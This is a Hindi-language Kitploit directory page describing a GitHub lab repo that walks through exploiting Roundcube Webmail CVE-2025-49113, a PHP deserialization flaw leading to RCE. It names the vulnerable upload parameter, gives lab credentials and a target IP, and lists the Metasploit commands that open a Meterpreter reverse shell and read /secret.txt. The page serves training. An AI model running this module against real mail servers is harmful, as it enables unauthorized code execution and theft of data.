Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
roundcube-cve-2025-49113-lab — Roundcube Webmail CVE-2025-49113 (प्रमाणित PHP ऑब्जेक्ट डीसीरियलाइज़ेशन → RCE) के लिए हैंड्स-ऑन शोषण प्रयोगशाला, /secret.txt पढ़ने के लिए। | Kitploit
उपकरण/GitHubGitHub/ankitpandey383/roundcube-cve-2025-49113-lab
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंगपेलोड डेवलपमेंट
लैब और अभ्यास
GitHubankitpandey383/roundcube-cve-2025-49113-lab

roundcube-cve-2025-49113-lab

Roundcube Webmail CVE-2025-49113 (प्रमाणित PHP ऑब्जेक्ट डीसीरियलाइज़ेशन → RCE) के लिए हैंड्स-ऑन शोषण प्रयोगशाला, /secret.txt पढ़ने के लिए।

रिपॉजिटरी देखें
39 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

"अस्वीकरण: केवल शैक्षिक उपयोग के लिए"

Roundcube Webmail RCE – CVE-2025-49113 लैब

यह रिपॉजिटरी /secret.txt में संग्रहीत गुप्त को प्राप्त करने के लिए एक नियंत्रित लैब में Roundcube Webmail CVE-2025-49113 के मेरे चरण-दर-चरण शोषण का दस्तावेजीकरण करती है।

⚠️ अस्वीकरण
सभी कार्य एक लैब / प्रशिक्षण वातावरण के विरुद्ध किए गए थे जिसका परीक्षण करने के लिए मैं अधिकृत हूँ।
उन प्रणालियों के विरुद्ध इन तकनीकों का उपयोग न करें जिनके आप स्वामी या प्रशासक नहीं हैं।


चुनौती

Roundcube Webmail एक ब्राउज़र-आधारित, ओपन-सोर्स PHP ईमेल क्लाइंट है जो IMAP के माध्यम से मेलबॉक्स से कनेक्ट होता है और SMTP के माध्यम से मेल भेजता है। यह आमतौर पर Apache या Nginx पर MySQL/PostgreSQL/SQLite के साथ चलता है और साझा होस्टिंग वातावरण में व्यापक रूप से उपयोग किया जाता है।

भेद्यता – CVE-2025-49113

Roundcube के सभी संस्करण 1.6.10 तक (और 1.5.x से पहले 1.5.10) में program/actions/settings/upload.php में एक महत्वपूर्ण बग है। _from पैरामीटर ठीक से मान्य नहीं किया गया है, जो एक प्रमाणित हमलावर को ट्रिगर करने और वेब सर्वर विशेषाधिकारों के साथ प्राप्त करने की अनुमति देता है।

असुरक्षित PHP ऑब्जेक्ट डिसीरियलाइज़ेशन
दूरस्थ कोड निष्पादन

लैब क्रेडेंशियल्स:

  • उपयोगकर्ता नाम: roundcube
  • पासवर्ड: rcpass

लक्ष्य:

/secret.txt फ़ाइल के अंदर गुप्त क्या है?


लैब वातावरण

  • हमलावर होस्ट: Kali / HackerBox जिसमें:
    • nmap
    • msfconsole (Metasploit 6)
  • लक्ष्य होस्ट: 172.20.2.57 पर Roundcube Webmail
  • उपयोग किया गया शोषण: exploit/multi/http/roundcube_auth_rce_cve_2025_49113

वॉकथ्रू

चरण 1 – Nmap के साथ सेवा खोज

कमांड: nmap -sV Target Machine

चरण 2 - Metasploit में PHP ऑब्जेक्ट डिसीरियलाइज़ेशन शोषण का पता लगाना

search php object deserialization

चरण 3 - Roundcube शोषण मॉड्यूल को कॉन्फ़िगर करना

msf6 > use exploit/multi/http/roundcube_auth_rce_cve_2025_49113 msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set RHOSTS Target Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set LHOST Kali Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set USERNAME Target Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set PASSWORD Target Machine

चरण 4 - Meterpreter सत्र प्राप्त करना और /secret.txt पढ़ना

meterpreter > cat /secret.txt

टूल डाउनलोड करें